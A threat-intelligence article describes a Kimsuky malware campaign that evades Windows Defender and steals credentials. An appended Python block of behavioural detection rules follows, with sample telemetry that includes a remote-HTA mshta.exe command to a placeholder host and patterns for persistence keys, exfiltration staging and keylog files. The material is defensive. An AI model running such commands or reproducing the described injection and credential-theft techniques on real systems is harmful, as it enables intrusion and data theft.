Sophisticated Kimsuky Campaign: New Malware Bypasses Windows Defender
The Kimsuky group has once again found itself at the center of attention following a campaign that deftly combined social engineering tactics with sophisticated techniques for bypassing Windows security mechanisms. Their targets included South Korean government agencies, defense contractors, and research institutions, whose employees received emails containing ZIP archives disguised as innocuous documents but in fact harboring malicious LNK shortcuts.
Executing the LNK file triggered the launch of mshta.exe, which loaded a remote HTML application hosted on a CDN. Hidden within this application was an obfuscated VBScript, intricately constructed using string variables and transformed via the CLng and Chr functions—making code analysis nearly impossible for conventional security tools. Simultaneously, a decoy PDF was launched to distract the user, styled to resemble an official government notice regarding infractions or penalties.
In parallel, the malicious script probed the system for Windows Defender activity, invoking a cmd command to determine the status of the WinDefend service. If Defender was active, the malware fetched an archive containing Base64-encoded PowerShell scripts tailored for data exfiltration and keylogging. To avoid redundant execution, a temporary file was created on the system, uniquely named using a UUID. These scripts also performed virtualization checks to detect whether the host environment was running on VMware, Microsoft Hyper-V, or VirtualBox, and established persistence by writing a registry key masquerading as WindowsSecurityCheck.
If Windows Defender was found to be disabled, the infection chain advanced to a more aggressive phase: an alternative HTA file embedded with Base64-encoded payloads was downloaded. These payloads were injected directly into memory—bypassing disk writes and avoiding detection by signature-based scanners. Decryption of the payloads was handled via the RC4 algorithm, with execution carried out using VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread—techniques that enabled code injection into legitimate system processes while evading traditional security checks.
Particular emphasis was placed on credential theft: the malware specifically sought the app_bound_encrypted_key stored by the Chrome, Edge, and Brave browsers—an essential component for decrypting stored passwords and cookies. In addition, the malware compressed certificate directories (NPKI and GPKI), exfiltrated recently accessed documents, gathered browser extension data, and systematically searched for files with sensitive extensions, including those related to cryptocurrency.
All exfiltrated data was stored in a uniquely named folder within %TEMP%, archived as init.zip, then renamed to init.dat, and exfiltrated to command-and-control servers via segmented POST requests, camouflaged to resemble ordinary web traffic. Keylogging was implemented using native Windows APIs to intercept keystrokes, clipboard activity, and active window titles, with logs saved to k.log and periodically transmitted to the attacker.
Throughout the entire attack lifecycle, the malware maintained persistent communication with its C2 infrastructure, polling every ten minutes to execute instructions for uploading, downloading, and running remote PowerShell commands—enabling dynamic updates and real-time behavioral adaptation.
The distinct fingerprints—Korean-themed decoys, PowerShell exploitation, and the tactical blend of social engineering with native system tools—strongly align with past Kimsuky campaigns, as corroborated by multiple public threat intelligence reports in 2025. This attack sequence underscores the group’s sophistication in crafting threats that evade detection by leveraging legitimate system components.
To mitigate such threats, experts recommend implementing behavioral monitoring, enhanced auditing of PowerShell activity, and centralized security platforms capable of identifying anomalies across enterprise environments.
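The behaviours reported above (mshta.exe loading a remote HTA, the cmd probe of the WinDefend service, the WindowsSecurityCheck persistence key, the init.zip/init.dat staging under %TEMP%, the k.log keylog file) can be turned into correlated behavioural detections of the kind the recommendation calls for. The Python below is an added example, not code from the article or from any vendor; its event schema, the sample telemetry, the "sc query" form of the service check and the Run-key location of the persistence value are assumptions.

```python
"""Behavioural detection rules for the chain described above. Added example, not
from the article; event schema (type/host/image/cmdline/key/path) is constructed."""
import re

# (rule name, event type, predicate); each name says which reported behaviour it covers.
RULES = [
    ("mshta_remote_hta", "process",
     lambda e: e.get("image", "").lower().endswith("mshta.exe")
     and re.search(r"https?://", e.get("cmdline", ""), re.I) is not None),
    ("windefend_status_probe", "process",
     lambda e: e.get("image", "").lower().endswith("cmd.exe")
     and "windefend" in e.get("cmdline", "").lower()),
    ("persistence_windowssecuritycheck", "registry",
     lambda e: e.get("key", "").lower().endswith("\\windowssecuritycheck")),
    ("temp_init_archive", "file",
     lambda e: "\\temp\\" in e.get("path", "").lower()
     and e.get("path", "").lower().endswith(("\\init.zip", "\\init.dat"))),
    ("keylog_file", "file",
     lambda e: e.get("path", "").lower().endswith("\\k.log")),
]

def score_events(events):
    """Return (host, rule) pairs for every event that matches a rule."""
    return [(ev.get("host"), name) for ev in events
            for name, etype, pred in RULES
            if ev.get("type") == etype and pred(ev)]

def flag_hosts(events, threshold=2):
    """Hosts showing at least `threshold` distinct behaviours; a single hit
    (one mshta launch, one archive in Temp) is too noisy to alert on alone."""
    seen = {}
    for host, rule in score_events(events):
        seen.setdefault(host, set()).add(rule)
    return {h for h, rules in seen.items() if len(rules) >= threshold}

# Constructed sample telemetry: ws01 shows the chain, ws02 is benign activity.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://cdn.example.invalid/notice.hta"},
    {"type": "process", "host": "ws01", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c sc query WinDefend"},  # assumed form of the service check
    {"type": "registry", "host": "ws01",  # Run-key location is an assumption
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsSecurityCheck"},
    {"type": "file", "host": "ws01", "path": r"C:\Users\a\AppData\Local\Temp\3f2a\init.dat"},
    {"type": "file", "host": "ws01", "path": r"C:\Users\a\AppData\Local\Temp\3f2a\k.log"},
    {"type": "process", "host": "ws02", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c dir"},
]
```

Correlating several weak behaviours per host, rather than alerting on any one of them, is what keeps mshta.exe and Temp-directory archives from drowning the queue in false positives.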